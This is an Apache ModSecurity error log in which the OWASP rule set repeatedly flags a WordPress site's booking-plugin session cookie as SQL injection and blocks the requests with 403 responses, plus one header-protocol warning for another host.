[Mon May 11 22:31:15.332062 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8k6FW67LJTsgN3jQNngAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:15.332376 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8k6FW67LJTsgN3jQNngAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:15.995343 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8k6FW67LJTsgN3jQNngAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:16.643817 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8lKFW67LJTsgN3jQNnwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:16.644100 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8lKFW67LJTsgN3jQNnwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:17.198763 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8lKFW67LJTsgN3jQNnwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:18.018965 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8lqFW67LJTsgN3jQNoAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:18.019288 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8lqFW67LJTsgN3jQNoAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:18.590417 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8lqFW67LJTsgN3jQNoAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:18.826745 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8lqFW67LJTsgN3jQNogAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:18.827038 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8lqFW67LJTsgN3jQNogAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:19.194367 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8lqFW67LJTsgN3jQNogAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:20.541986 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8mKFW67LJTsgN3jQNowAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:20.542280 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8mKFW67LJTsgN3jQNowAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:21.127397 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8mKFW67LJTsgN3jQNowAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:21.731703 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8maFW67LJTsgN3jQNpQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:21.731997 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8maFW67LJTsgN3jQNpQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:22.373323 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8maFW67LJTsgN3jQNpQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:23.133019 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8m6FW67LJTsgN3jQNpgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:23.133319 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8m6FW67LJTsgN3jQNpgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:23.707250 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8m6FW67LJTsgN3jQNpgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:25.135669 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8naFW67LJTsgN3jQNqAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:25.135990 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8naFW67LJTsgN3jQNqAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:25.712170 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8naFW67LJTsgN3jQNqAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:25.932145 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8naFW67LJTsgN3jQNqQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:25.932439 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8naFW67LJTsgN3jQNqQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:26.484253 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8naFW67LJTsgN3jQNqQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:27.618476 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8n6FW67LJTsgN3jQNswAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:27.618796 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8n6FW67LJTsgN3jQNswAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:27.978514 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8n6FW67LJTsgN3jQNswAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:28.275280 2026] [security2:error] [pid 1601130:tid 1601158] [client 162.62.213.187:59550] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8oHEgAO_835W6c1mYFQAAAEg"]
[Mon May 11 22:31:28.847840 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8oKFW67LJTsgN3jQNtAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:28.848139 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8oKFW67LJTsgN3jQNtAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:29.440702 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8oKFW67LJTsgN3jQNtAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:31.430879 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8o6FW67LJTsgN3jQNtgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:31.431232 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8o6FW67LJTsgN3jQNtgAAABU"], referer: https://rentparadise.fr/wp-login.php
